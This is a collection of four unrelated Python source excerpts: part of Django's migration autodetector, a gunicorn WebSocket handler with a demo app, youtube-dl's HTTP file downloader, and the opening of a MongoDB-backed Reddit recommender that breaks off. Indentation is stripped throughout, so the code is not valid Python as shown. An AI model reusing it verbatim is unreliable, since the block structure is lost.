self.add_operation(
app_label,
operations.AlterUniqueTogether(
name=model_name,
unique_together=None,
)
)
if index_together:
self.add_operation(
app_label,
operations.AlterIndexTogether(
name=model_name,
index_together=None,
)
)
# Then remove each related field
for name, field in sorted(related_fields.items()):
self.add_operation(
app_label,
operations.RemoveField(
model_name=model_name,
name=name,
)
)
# Finally, remove the model.
# This depends on both the removal/alteration of all incoming fields
# and the removal of all its own related fields, and if it's
# a through model the field that references it.
dependencies = []
for related_object in model._meta.related_objects:
related_object_app_label = related_object.related_model._meta.app_label
object_name = related_object.related_model._meta.object_name
field_name = related_object.field.name
dependencies.append((related_object_app_label, object_name, field_name, False))
if not related_object.many_to_many:
dependencies.append((related_object_app_label, object_name, field_name, "alter"))
for name, field in sorted(related_fields.items()):
dependencies.append((app_label, model_name, name, False))
# We're referenced in another field's through=
through_user = self.through_users.get((app_label, model_state.name_lower))
if through_user:
dependencies.append((through_user[0], through_user[1], through_user[2], False))
# Finally, make the operation, deduping any dependencies
self.add_operation(
app_label,
operations.DeleteModel(
name=model_state.name,
),
dependencies=list(set(dependencies)),
)
def generate_deleted_proxies(self):
"""
Makes DeleteModel statements for proxy models.
"""
deleted = set(self.old_proxy_keys) - set(self.new_proxy_keys)
for app_label, model_name in sorted(deleted):
model_state = self.from_state.models[app_label, model_name]
assert model_state.options.get("proxy")
self.add_operation(
app_label,
operations.DeleteModel(
name=model_state.name,
),
)
def generate_renamed_fields(self):
"""
Works out renamed fields
"""
self.renamed_fields = {}
for app_label, model_name, field_name in sorted(self.new_field_keys - self.old_field_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
# Scan to see if this is actually a rename!
field_dec = self.deep_deconstruct(field)
for rem_app_label, rem_model_name, rem_field_name in sorted(self.old_field_keys - self.new_field_keys):
if rem_app_label == app_label and rem_model_name == model_name:
old_field_dec = self.deep_deconstruct(old_model_state.get_field_by_name(rem_field_name))
if field.remote_field and field.remote_field.model and 'to' in old_field_dec[2]:
old_rel_to = old_field_dec[2]['to']
if old_rel_to in self.renamed_models_rel:
old_field_dec[2]['to'] = self.renamed_models_rel[old_rel_to]
if old_field_dec == field_dec:
if self.questioner.ask_rename(model_name, rem_field_name, field_name, field):
self.add_operation(
app_label,
operations.RenameField(
model_name=model_name,
old_name=rem_field_name,
new_name=field_name,
)
)
self.old_field_keys.remove((rem_app_label, rem_model_name, rem_field_name))
self.old_field_keys.add((app_label, model_name, field_name))
self.renamed_fields[app_label, model_name, field_name] = rem_field_name
break
def generate_added_fields(self):
"""
Fields that have been added
"""
for app_label, model_name, field_name in sorted(self.new_field_keys - self.old_field_keys):
self._generate_added_field(app_label, model_name, field_name)
def _generate_added_field(self, app_label, model_name, field_name):
field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
# Fields that are foreignkeys/m2ms depend on stuff
dependencies = []
if field.remote_field and field.remote_field.model:
# Account for FKs to swappable models
swappable_setting = getattr(field, 'swappable_setting', None)
if swappable_setting is not None:
dep_app_label = "__setting__"
dep_object_name = swappable_setting
else:
dep_app_label = field.remote_field.model._meta.app_label
dep_object_name = field.remote_field.model._meta.object_name
dependencies = [(dep_app_label, dep_object_name, None, True)]
if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
dependencies.append((
field.remote_field.through._meta.app_label,
field.remote_field.through._meta.object_name,
None,
True,
))
# You can't just add NOT NULL fields with no default or fields
# which don't allow empty strings as default.
preserve_default = True
if (not field.null and not field.has_default() and
not isinstance(field, models.ManyToManyField) and
not (field.blank and field.empty_strings_allowed)):
field = field.clone()
field.default = self.questioner.ask_not_null_addition(field_name, model_name)
preserve_default = False
self.add_operation(
app_label,
operations.AddField(
model_name=model_name,
name=field_name,
field=field,
preserve_default=preserve_default,
),
dependencies=dependencies,
)
def generate_removed_fields(self):
"""
Fields that have been removed.
"""
for app_label, model_name, field_name in sorted(self.old_field_keys - self.new_field_keys):
self._generate_removed_field(app_label, model_name, field_name)
def _generate_removed_field(self, app_label, model_name, field_name):
self.add_operation(
app_label,
operations.RemoveField(
model_name=model_name,
name=field_name,
),
# We might need to depend on the removal of an
# order_with_respect_to or index/unique_together operation;
# this is safely ignored if there isn't one
dependencies=[
(app_label, model_name, field_name, "order_wrt_unset"),
(app_label, model_name, field_name, "foo_together_change"),
],
)
def generate_altered_fields(self):
"""
Fields that have been altered.
"""
for app_label, model_name, field_name in sorted(self.old_field_keys.intersection(self.new_field_keys)):
# Did the field change?
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_field_name = self.renamed_fields.get((app_label, model_name, field_name), field_name)
old_field = self.old_apps.get_model(app_label, old_model_name)._meta.get_field(old_field_name)
new_field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
# Implement any model renames on relations; these are handled by RenameModel
# so we need to exclude them from the comparison
if hasattr(new_field, "remote_field") and getattr(new_field.remote_field, "model", None):
rename_key = (
new_field.remote_field.model._meta.app_label,
new_field.remote_field.model._meta.model_name,
)
if rename_key in self.renamed_models:
new_field.remote_field.model = old_field.remote_field.model
old_field_dec = self.deep_deconstruct(old_field)
new_field_dec = self.deep_deconstruct(new_field)
if old_field_dec != new_field_dec:
both_m2m = (
isinstance(old_field, models.ManyToManyField) and
isinstance(new_field, models.ManyToManyField)
)
neither_m2m = (
not isinstance(old_field, models.ManyToManyField) and
not isinstance(new_field, models.ManyToManyField)
)
if both_m2m or neither_m2m:
# Either both fields are m2m or neither is
preserve_default = True
if (old_field.null and not new_field.null and not new_field.has_default() and
not isinstance(new_field, models.ManyToManyField)):
field = new_field.clone()
new_default = self.questioner.ask_not_null_alteration(field_name, model_name)
if new_default is not models.NOT_PROVIDED:
field.default = new_default
preserve_default = False
else:
field = new_field
self.add_operation(
app_label,
operations.AlterField(
model_name=model_name,
name=field_name,
field=field,
preserve_default=preserve_default,
)
)
else:
# We cannot alter between m2m and concrete fields
self._generate_removed_field(app_label, model_name, field_name)
self._generate_added_field(app_label, model_name, field_name)
def _generate_altered_foo_together(self, operation):
option_name = operation.option_name
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
# We run the old version through the field renames to account for those
old_value = old_model_state.options.get(option_name) or set()
if old_value:
old_value = {
tuple(
self.renamed_fields.get((app_label, model_name, n), n)
for n in unique
)
for unique in old_value
}
new_value = new_model_state.options.get(option_name) or set()
if new_value:
new_value = set(new_value)
if old_value != new_value:
self.add_operation(
app_label,
operation(
name=model_name,
**{option_name: new_value}
)
)
def generate_altered_unique_together(self):
self._generate_altered_foo_together(operations.AlterUniqueTogether)
def generate_altered_index_together(self):
self._generate_altered_foo_together(operations.AlterIndexTogether)
def generate_altered_db_table(self):
models_to_check = self.kept_model_keys.union(self.kept_proxy_keys).union(self.kept_unmanaged_keys)
for app_label, model_name in sorted(models_to_check):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
old_db_table_name = old_model_state.options.get('db_table')
new_db_table_name = new_model_state.options.get('db_table')
if old_db_table_name != new_db_table_name:
self.add_operation(
app_label,
operations.AlterModelTable(
name=model_name,
table=new_db_table_name,
)
)
def generate_altered_options(self):
"""
Works out if any non-schema-affecting options have changed and
makes an operation to represent them in state changes (in case Python
code in migrations needs them)
"""
models_to_check = self.kept_model_keys.union(
self.kept_proxy_keys
).union(
self.kept_unmanaged_keys
).union(
# unmanaged converted to managed
set(self.old_unmanaged_keys).intersection(self.new_model_keys)
).union(
# managed converted to unmanaged
set(self.old_model_keys).intersection(self.new_unmanaged_keys)
)
for app_label, model_name in sorted(models_to_check):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
old_options = dict(
option for option in old_model_state.options.items()
if option[0] in AlterModelOptions.ALTER_OPTION_KEYS
)
new_options = dict(
option for option in new_model_state.options.items()
if option[0] in AlterModelOptions.ALTER_OPTION_KEYS
)
if old_options != new_options:
self.add_operation(
app_label,
operations.AlterModelOptions(
name=model_name,
options=new_options,
)
)
def generate_altered_order_with_respect_to(self):
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
if (old_model_state.options.get("order_with_respect_to") !=
new_model_state.options.get("order_with_respect_to")):
# Make sure it comes second if we're adding
# (removal dependency is part of RemoveField)
dependencies = []
if new_model_state.options.get("order_with_respect_to"):
dependencies.append((
app_label,
model_name,
new_model_state.options["order_with_respect_to"],
True,
))
# Actually generate the operation
self.add_operation(
app_label,
operations.AlterOrderWithRespectTo(
name=model_name,
order_with_respect_to=new_model_state.options.get('order_with_respect_to'),
),
dependencies=dependencies,
)
def generate_altered_managers(self):
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
if old_model_state.managers != new_model_state.managers:
self.add_operation(
app_label,
operations.AlterModelManagers(
name=model_name,
managers=new_model_state.managers,
)
)
def arrange_for_graph(self, changes, graph, migration_name=None):
"""
Takes in a result from changes() and a MigrationGraph,
and fixes the names and dependencies of the changes so they
extend the graph from the leaf nodes for each app.
"""
leaves = graph.leaf_nodes()
name_map = {}
for app_label, migrations in list(changes.items()):
if not migrations:
continue
# Find the app label's current leaf node
app_leaf = None
for leaf in leaves:
if leaf[0] == app_label:
app_leaf = leaf
break
# Do they want an initial migration for this app?
if app_leaf is None and not self.questioner.ask_initial(app_label):
# They don't.
for migration in migrations:
name_map[(app_label, migration.name)] = (app_label, "__first__")
del changes[app_label]
continue
# Work out the next number in the sequence
if app_leaf is None:
next_number = 1
else:
next_number = (self.parse_number(app_leaf[1]) or 0) + 1
# Name each migration
for i, migration in enumerate(migrations):
if i == 0 and app_leaf:
migration.dependencies.append(app_leaf)
if i == 0 and not app_leaf:
new_name = "0001_%s" % migration_name if migration_name else "0001_initial"
else:
new_name = "%04i_%s" % (
next_number,
migration_name or self.suggest_name(migration.operations)[:100],
)
name_map[(app_label, migration.name)] = (app_label, new_name)
next_number += 1
migration.name = new_name
# Now fix dependencies
for app_label, migrations in changes.items():
for migration in migrations:
migration.dependencies = [name_map.get(d, d) for d in migration.dependencies]
return changes
def _trim_to_apps(self, changes, app_labels):
"""
Takes changes from arrange_for_graph and set of app labels and
returns a modified set of changes which trims out as many migrations
that are not in app_labels as possible.
Note that some other migrations may still be present, as they may be
required dependencies.
"""
# Gather other app dependencies in a first pass
app_dependencies = {}
for app_label, migrations in changes.items():
for migration in migrations:
for dep_app_label, name in migration.dependencies:
app_dependencies.setdefault(app_label, set()).add(dep_app_label)
required_apps = set(app_labels)
# Keep resolving till there's no change
old_required_apps = None
while old_required_apps != required_apps:
old_required_apps = set(required_apps)
for app_label in list(required_apps):
required_apps.update(app_dependencies.get(app_label, set()))
# Remove all migrations that aren't needed
for app_label in list(changes.keys()):
if app_label not in required_apps:
del changes[app_label]
return changes
@classmethod
def suggest_name(cls, ops):
"""
Given a set of operations, suggests a name for the migration
they might represent. Names are not guaranteed to be unique,
but we put some effort in to the fallback name to avoid VCS conflicts
if we can.
"""
if len(ops) == 1:
if isinstance(ops[0], operations.CreateModel):
return ops[0].name_lower
elif isinstance(ops[0], operations.DeleteModel):
return "delete_%s" % ops[0].name_lower
elif isinstance(ops[0], operations.AddField):
return "%s_%s" % (ops[0].model_name_lower, ops[0].name_lower)
elif isinstance(ops[0], operations.RemoveField):
return "remove_%s_%s" % (ops[0].model_name_lower, ops[0].name_lower)
elif len(ops) > 1:
if all(isinstance(o, operations.CreateModel) for o in ops):
return "_".join(sorted(o.name_lower for o in ops))
return "auto_%s" % datetime.datetime.now().strftime("%Y%m%d_%H%M")
@classmethod
def parse_number(cls, name):
"""
Given a migration name, tries to extract a number from the
beginning of it. If no number found, returns None.
"""
if re.match(r"^\d+_", name):
return int(name.split("_")[0])
return None
|
|
import collections
import errno
import re
from hashlib import sha1
import base64
from base64 import b64encode, b64decode
import socket
import struct
import logging
from socket import error as SocketError
import gevent
from gunicorn.workers.async import ALREADY_HANDLED
logger = logging.getLogger(__name__)
WS_KEY = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
class WebSocketWSGI(object):
def __init__(self, handler):
self.handler = handler
def verify_client(self, ws):
pass
def _get_key_value(self, key_value):
if not key_value:
return
key_number = int(re.sub("\\D", "", key_value))
spaces = re.subn(" ", "", key_value)[1]
if key_number % spaces != 0:
return
part = key_number / spaces
return part
def __call__(self, environ, start_response):
if not (environ.get('HTTP_CONNECTION').find('Upgrade') != -1 and
environ['HTTP_UPGRADE'].lower() == 'websocket'):
# need to check a few more things here for true compliance
start_response('400 Bad Request', [('Connection','close')])
return []
sock = environ['gunicorn.socket']
version = environ.get('HTTP_SEC_WEBSOCKET_VERSION')
ws = WebSocket(sock, environ, version)
handshake_reply = ("HTTP/1.1 101 Switching Protocols\r\n"
"Upgrade: websocket\r\n"
"Connection: Upgrade\r\n")
key = environ.get('HTTP_SEC_WEBSOCKET_KEY')
if key:
ws_key = base64.b64decode(key)
if len(ws_key) != 16:
start_response('400 Bad Request', [('Connection','close')])
return []
protocols = []
subprotocols = environ.get('HTTP_SEC_WEBSOCKET_PROTOCOL')
ws_protocols = []
if subprotocols:
for s in subprotocols.split(','):
s = s.strip()
if s in protocols:
ws_protocols.append(s)
if ws_protocols:
handshake_reply += 'Sec-WebSocket-Protocol: %s\r\n' % ', '.join(ws_protocols)
exts = []
extensions = environ.get('HTTP_SEC_WEBSOCKET_EXTENSIONS')
ws_extensions = []
if extensions:
for ext in extensions.split(','):
ext = ext.strip()
if ext in exts:
ws_extensions.append(ext)
if ws_extensions:
handshake_reply += 'Sec-WebSocket-Extensions: %s\r\n' % ', '.join(ws_extensions)
handshake_reply += (
"Sec-WebSocket-Origin: %s\r\n"
"Sec-WebSocket-Location: ws://%s%s\r\n"
"Sec-WebSocket-Version: %s\r\n"
"Sec-WebSocket-Accept: %s\r\n\r\n"
% (
environ.get('HTTP_ORIGIN'),
environ.get('HTTP_HOST'),
ws.path,
version,
base64.b64encode(sha1(key + WS_KEY).digest())
))
else:
handshake_reply += (
"WebSocket-Origin: %s\r\n"
"WebSocket-Location: ws://%s%s\r\n\r\n" % (
environ.get('HTTP_ORIGIN'),
environ.get('HTTP_HOST'),
ws.path))
sock.sendall(handshake_reply)
try:
self.handler(ws)
except socket.error as e:
if e[0] != errno.EPIPE:
raise
# use this undocumented feature of grainbows to ensure that it
# doesn't barf on the fact that we didn't call start_response
return ALREADY_HANDLED
class WebSocket(object):
"""A websocket object that handles the details of
serialization/deserialization to the socket.
The primary way to interact with a :class:`WebSocket` object is to
call :meth:`send` and :meth:`wait` in order to pass messages back
and forth with the browser. Also available are the following
properties:
path
The path value of the request. This is the same as the WSGI PATH_INFO variable, but more convenient.
protocol
The value of the Websocket-Protocol header.
origin
The value of the 'Origin' header.
environ
The full WSGI environment for this request.
"""
def __init__(self, sock, environ, version=76):
"""
:param socket: The eventlet socket
:type socket: :class:`eventlet.greenio.GreenSocket`
:param environ: The wsgi environment
:param version: The WebSocket spec version to follow (default is 76)
"""
self.socket = sock
self.origin = environ.get('HTTP_ORIGIN')
self.protocol = environ.get('HTTP_WEBSOCKET_PROTOCOL')
self.path = environ.get('PATH_INFO')
self.environ = environ
self.version = version
self.websocket_closed = False
self._buf = ""
self._msgs = collections.deque()
#self._sendlock = semaphore.Semaphore()
@staticmethod
def encode_hybi(buf, opcode, base64=False):
""" Encode a HyBi style WebSocket frame.
Optional opcode:
0x0 - continuation
0x1 - text frame (base64 encode buf)
0x2 - binary frame (use raw buf)
0x8 - connection close
0x9 - ping
0xA - pong
"""
if base64:
buf = b64encode(buf)
b1 = 0x80 | (opcode & 0x0f) # FIN + opcode
payload_len = len(buf)
if payload_len <= 125:
header = struct.pack('>BB', b1, payload_len)
elif payload_len > 125 and payload_len < 65536:
header = struct.pack('>BBH', b1, 126, payload_len)
elif payload_len >= 65536:
header = struct.pack('>BBQ', b1, 127, payload_len)
#print("Encoded: %s" % repr(header + buf))
return header + buf, len(header), 0
@staticmethod
def decode_hybi(buf, base64=False):
""" Decode HyBi style WebSocket packets.
Returns:
{'fin' : 0_or_1,
'opcode' : number,
'mask' : 32_bit_number,
'hlen' : header_bytes_number,
'length' : payload_bytes_number,
'payload' : decoded_buffer,
'left' : bytes_left_number,
'close_code' : number,
'close_reason' : string}
"""
f = {'fin' : 0,
'opcode' : 0,
'mask' : 0,
'hlen' : 2,
'length' : 0,
'payload' : None,
'left' : 0,
'close_code' : None,
'close_reason' : None}
blen = len(buf)
f['left'] = blen
if blen < f['hlen']:
return f # Incomplete frame header
b1, b2 = struct.unpack_from(">BB", buf)
f['opcode'] = b1 & 0x0f
f['fin'] = (b1 & 0x80) >> 7
has_mask = (b2 & 0x80) >> 7
f['length'] = b2 & 0x7f
if f['length'] == 126:
f['hlen'] = 4
if blen < f['hlen']:
return f # Incomplete frame header
(f['length'],) = struct.unpack_from('>xxH', buf)
elif f['length'] == 127:
f['hlen'] = 10
if blen < f['hlen']:
return f # Incomplete frame header
(f['length'],) = struct.unpack_from('>xxQ', buf)
full_len = f['hlen'] + has_mask * 4 + f['length']
if blen < full_len: # Incomplete frame
return f # Incomplete frame header
# Number of bytes that are part of the next frame(s)
f['left'] = blen - full_len
# Process 1 frame
if has_mask:
# unmask payload
f['mask'] = buf[f['hlen']:f['hlen']+4]
b = c = ''
if f['length'] >= 4:
data = struct.unpack('<I', buf[f['hlen']:f['hlen']+4])[0]
of1 = f['hlen']+4
b = ''
for i in xrange(0, int(f['length']/4)):
mask = struct.unpack('<I', buf[of1+4*i:of1+4*(i+1)])[0]
b += struct.pack('I', data ^ mask)
if f['length'] % 4:
l = f['length'] % 4
of1 = f['hlen']
of2 = full_len - l
c = ''
for i in range(0, l):
mask = struct.unpack('B', buf[of1 + i])[0]
data = struct.unpack('B', buf[of2 + i])[0]
c += chr(data ^ mask)
f['payload'] = b + c
else:
print("Unmasked frame: %s" % repr(buf))
f['payload'] = buf[(f['hlen'] + has_mask * 4):full_len]
if base64 and f['opcode'] in [1, 2]:
try:
f['payload'] = b64decode(f['payload'])
except:
print("Exception while b64decoding buffer: %s" %
repr(buf))
raise
if f['opcode'] == 0x08:
if f['length'] >= 2:
f['close_code'] = struct.unpack_from(">H", f['payload'])
if f['length'] > 3:
f['close_reason'] = f['payload'][2:]
return f
@staticmethod
def _pack_message(message):
"""Pack the message inside ``00`` and ``FF``
As per the dataframing section (5.3) for the websocket spec
"""
if isinstance(message, unicode):
message = message.encode('utf-8')
elif not isinstance(message, str):
message = str(message)
packed = "\x00%s\xFF" % message
return packed
def _parse_messages(self):
""" Parses for messages in the buffer *buf*. It is assumed that
the buffer contains the start character for a message, but that it
may contain only part of the rest of the message.
Returns an array of messages, and the buffer remainder that
didn't contain any full messages."""
msgs = []
end_idx = 0
buf = self._buf
while buf:
if self.version in ['7', '8', '13']:
frame = self.decode_hybi(buf, base64=False)
#print("Received buf: %s, frame: %s" % (repr(buf), frame))
if frame['payload'] == None:
break
else:
if frame['opcode'] == 0x8: # connection close
self.websocket_closed = True
break
#elif frame['opcode'] == 0x1:
else:
msgs.append(frame['payload']);
#msgs.append(frame['payload'].decode('utf-8', 'replace'));
#buf = buf[-frame['left']:]
if frame['left']:
buf = buf[-frame['left']:]
else:
buf = ''
else:
frame_type = ord(buf[0])
if frame_type == 0:
# Normal message.
end_idx = buf.find("\xFF")
if end_idx == -1: #pragma NO COVER
break
msgs.append(buf[1:end_idx].decode('utf-8', 'replace'))
buf = buf[end_idx+1:]
elif frame_type == 255:
# Closing handshake.
assert ord(buf[1]) == 0, "Unexpected closing handshake: %r" % buf
self.websocket_closed = True
break
else:
raise ValueError("Don't understand how to parse this type of message: %r" % buf)
self._buf = buf
return msgs
def send(self, message):
"""Send a message to the browser.
*message* should be convertable to a string; unicode objects should be
encodable as utf-8. Raises socket.error with errno of 32
(broken pipe) if the socket has already been closed by the client."""
if self.version in ['7', '8', '13']:
packed, lenhead, lentail = self.encode_hybi(message, opcode=0x01, base64=False)
else:
packed = self._pack_message(message)
# if two greenthreads are trying to send at the same time
# on the same socket, sendlock prevents interleaving and corruption
#self._sendlock.acquire()
try:
self.socket.sendall(packed)
finally:
pass
#self._sendlock.release()
def wait(self):
"""Waits for and deserializes messages.
Returns a single message; the oldest not yet processed. If the client
has already closed the connection, returns None. This is different
from normal socket behavior because the empty string is a valid
websocket message."""
while not self._msgs:
# Websocket might be closed already.
if self.websocket_closed:
return None
# no parsed messages, must mean buf needs more data
delta = self.socket.recv(8096)
if delta == '':
return None
self._buf += delta
msgs = self._parse_messages()
self._msgs.extend(msgs)
return self._msgs.popleft()
def _send_closing_frame(self, ignore_send_errors=False):
"""Sends the closing frame to the client, if required."""
if self.version in ['7', '8', '13'] and not self.websocket_closed:
msg = ''
#if code != None:
# msg = struct.pack(">H%ds" % (len(reason)), code)
buf, h, t = self.encode_hybi(msg, opcode=0x08, base64=False)
self.socket.sendall(buf)
self.websocket_closed = True
elif self.version == 76 and not self.websocket_closed:
try:
self.socket.sendall("\xff\x00")
except SocketError:
# Sometimes, like when the remote side cuts off the connection,
# we don't care about this.
if not ignore_send_errors: #pragma NO COVER
raise
self.websocket_closed = True
def close(self):
"""Forcibly close the websocket; generally it is preferable to
return from the handler method."""
self._send_closing_frame()
self.socket.shutdown(True)
self.socket.close()
# demo app
import os
import random
def handle(ws):
""" This is the websocket handler function. Note that we
can dispatch based on path in here, too."""
if ws.path == '/echo':
while True:
m = ws.wait()
if m is None:
break
ws.send(m)
elif ws.path == '/data':
for i in xrange(10000):
ws.send("0 %s %s\n" % (i, random.random()))
gevent.sleep(0.1)
wsapp = WebSocketWSGI(handle)
def app(environ, start_response):
""" This resolves to the web page or the websocket depending on
the path."""
if environ['PATH_INFO'] == '/' or environ['PATH_INFO'] == "":
data = open(os.path.join(
os.path.dirname(__file__),
'websocket.html')).read()
data = data % environ
start_response('200 OK', [('Content-Type', 'text/html'),
('Content-Length', len(data))])
return [data]
else:
return wsapp(environ, start_response)
|
|
from __future__ import unicode_literals
import errno
import os
import socket
import time
import re
from .common import FileDownloader
from ..compat import compat_urllib_error
from ..utils import (
ContentTooShortError,
encodeFilename,
sanitize_open,
sanitized_Request,
)
class HttpFD(FileDownloader):
def real_download(self, filename, info_dict):
url = info_dict['url']
tmpfilename = self.temp_name(filename)
stream = None
# Do not include the Accept-Encoding header
headers = {'Youtubedl-no-compression': 'True'}
add_headers = info_dict.get('http_headers')
if add_headers:
headers.update(add_headers)
basic_request = sanitized_Request(url, None, headers)
request = sanitized_Request(url, None, headers)
is_test = self.params.get('test', False)
if is_test:
request.add_header('Range', 'bytes=0-%s' % str(self._TEST_FILE_SIZE - 1))
# Establish possible resume length
if os.path.isfile(encodeFilename(tmpfilename)):
resume_len = os.path.getsize(encodeFilename(tmpfilename))
else:
resume_len = 0
open_mode = 'wb'
if resume_len != 0:
if self.params.get('continuedl', True):
self.report_resuming_byte(resume_len)
request.add_header('Range', 'bytes=%d-' % resume_len)
open_mode = 'ab'
else:
resume_len = 0
count = 0
retries = self.params.get('retries', 0)
while count <= retries:
# Establish connection
try:
data = self.ydl.urlopen(request)
# When trying to resume, Content-Range HTTP header of response has to be checked
# to match the value of requested Range HTTP header. This is due to a webservers
# that don't support resuming and serve a whole file with no Content-Range
# set in response despite of requested Range (see
# https://github.com/rg3/youtube-dl/issues/6057#issuecomment-126129799)
if resume_len > 0:
content_range = data.headers.get('Content-Range')
if content_range:
content_range_m = re.search(r'bytes (\d+)-', content_range)
# Content-Range is present and matches requested Range, resume is possible
if content_range_m and resume_len == int(content_range_m.group(1)):
break
# Content-Range is either not present or invalid. Assuming remote webserver is
# trying to send the whole file, resume is not possible, so wiping the local file
# and performing entire redownload
self.report_unable_to_resume()
resume_len = 0
open_mode = 'wb'
break
except (compat_urllib_error.HTTPError, ) as err:
if (err.code < 500 or err.code >= 600) and err.code != 416:
# Unexpected HTTP error
raise
elif err.code == 416:
# Unable to resume (requested range not satisfiable)
try:
# Open the connection again without the range header
data = self.ydl.urlopen(basic_request)
content_length = data.info()['Content-Length']
except (compat_urllib_error.HTTPError, ) as err:
if err.code < 500 or err.code >= 600:
raise
else:
# Examine the reported length
if (content_length is not None and
(resume_len - 100 < int(content_length) < resume_len + 100)):
# The file had already been fully downloaded.
# Explanation to the above condition: in issue #175 it was revealed that
# YouTube sometimes adds or removes a few bytes from the end of the file,
# changing the file size slightly and causing problems for some users. So
# I decided to implement a suggested change and consider the file
# completely downloaded if the file size differs less than 100 bytes from
# the one in the hard drive.
self.report_file_already_downloaded(filename)
self.try_rename(tmpfilename, filename)
self._hook_progress({
'filename': filename,
'status': 'finished',
'downloaded_bytes': resume_len,
'total_bytes': resume_len,
})
return True
else:
# The length does not match, we start the download over
self.report_unable_to_resume()
resume_len = 0
open_mode = 'wb'
break
except socket.error as e:
if e.errno != errno.ECONNRESET:
# Connection reset is no problem, just retry
raise
# Retry
count += 1
if count <= retries:
self.report_retry(count, retries)
if count > retries:
self.report_error('giving up after %s retries' % retries)
return False
data_len = data.info().get('Content-length', None)
# Range HTTP header may be ignored/unsupported by a webserver
# (e.g. extractor/scivee.py, extractor/bambuser.py).
# However, for a test we still would like to download just a piece of a file.
# To achieve this we limit data_len to _TEST_FILE_SIZE and manually control
# block size when downloading a file.
if is_test and (data_len is None or int(data_len) > self._TEST_FILE_SIZE):
data_len = self._TEST_FILE_SIZE
if data_len is not None:
data_len = int(data_len) + resume_len
min_data_len = self.params.get('min_filesize')
max_data_len = self.params.get('max_filesize')
if min_data_len is not None and data_len < min_data_len:
self.to_screen('\r[download] File is smaller than min-filesize (%s bytes < %s bytes). Aborting.' % (data_len, min_data_len))
return False
if max_data_len is not None and data_len > max_data_len:
self.to_screen('\r[download] File is larger than max-filesize (%s bytes > %s bytes). Aborting.' % (data_len, max_data_len))
return False
byte_counter = 0 + resume_len
block_size = self.params.get('buffersize', 1024)
start = time.time()
# measure time over whole while-loop, so slow_down() and best_block_size() work together properly
now = None # needed for slow_down() in the first loop run
before = start # start measuring
while True:
# Download and write
data_block = data.read(block_size if not is_test else min(block_size, data_len - byte_counter))
byte_counter += len(data_block)
# exit loop when download is finished
if len(data_block) == 0:
break
# Open destination file just in time
if stream is None:
try:
(stream, tmpfilename) = sanitize_open(tmpfilename, open_mode)
assert stream is not None
filename = self.undo_temp_name(tmpfilename)
self.report_destination(filename)
except (OSError, IOError) as err:
self.report_error('unable to open for writing: %s' % str(err))
return False
if self.params.get('xattr_set_filesize', False) and data_len is not None:
try:
import xattr
xattr.setxattr(tmpfilename, 'user.ytdl.filesize', str(data_len))
except(OSError, IOError, ImportError) as err:
self.report_error('unable to set filesize xattr: %s' % str(err))
try:
stream.write(data_block)
except (IOError, OSError) as err:
self.to_stderr('\n')
self.report_error('unable to write data: %s' % str(err))
return False
# Apply rate limit
self.slow_down(start, now, byte_counter - resume_len)
# end measuring of one loop run
now = time.time()
after = now
# Adjust block size
if not self.params.get('noresizebuffer', False):
block_size = self.best_block_size(after - before, len(data_block))
before = after
# Progress message
speed = self.calc_speed(start, now, byte_counter - resume_len)
if data_len is None:
eta = None
else:
eta = self.calc_eta(start, time.time(), data_len - resume_len, byte_counter - resume_len)
self._hook_progress({
'status': 'downloading',
'downloaded_bytes': byte_counter,
'total_bytes': data_len,
'tmpfilename': tmpfilename,
'filename': filename,
'eta': eta,
'speed': speed,
'elapsed': now - start,
})
if is_test and byte_counter == data_len:
break
if stream is None:
self.to_stderr('\n')
self.report_error('Did not get any data blocks')
return False
if tmpfilename != '-':
stream.close()
if data_len is not None and byte_counter != data_len:
raise ContentTooShortError(byte_counter, int(data_len))
self.try_rename(tmpfilename, filename)
# Update file modification time
if self.params.get('updatetime', True):
info_dict['filetime'] = self.try_utime(filename, data.info().get('last-modified', None))
self._hook_progress({
'downloaded_bytes': byte_counter,
'total_bytes': byte_counter,
'filename': filename,
'status': 'finished',
'elapsed': time.time() - start,
})
return True
|
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from graphviz import Digraph
import math
import pymongo
import argparse
import sys
import os
import pickle
class Recommender:
def __init__(self, depth=2, nsfw=False, verbose=False):
self.depth = depth
self.verbose = verbose
self.nsfw = nsfw
# These vary from graph to graph
self.edges = {}
self.censored_cnt = 0
# Alternate path for generated files
# Used in webapp to specify 'static' dir
self.output_path = ''
# Data structures used to construct d3 output json
self.d3_node_list = []
self.node_idx_map = {}
self.d3_edges = []
self.col = None
self.local_dict = {}
self.up_visited = {}
self.down_visited = {}
def msg(self, message):
""" Conditional print to console """
# A single point to check verbosity
if self.verbose:
print(message)
def load_dataset(self):
""" Setup db cursor and load cached data into memory """
# Load env variable MONGOCLIENT if set, otherwise set to localhost
uri = os.environ.get('MONGOCLIENT', 'localhost')
client = pymongo.MongoClient(uri)
db = client.redditgraph
self.col = db.subreddits
# Load a local copy of accessed database records, mitigates Mongolab
# response times
pickle_dict = "local_dict.pickle"
if os.path.exists(pickle_dict):
self.local_dict = pickle.load(open(pickle_dict, "rb"))
def query_db(self, sub_name):
""" Check the local cache, otherwise query remote db """
# Memoize database queries
if sub_name in self.local_dict:
sub = self.local_dict[sub_name]
# If local lookup fails do db lookup
if not sub:
del self.local_dict[sub_name]
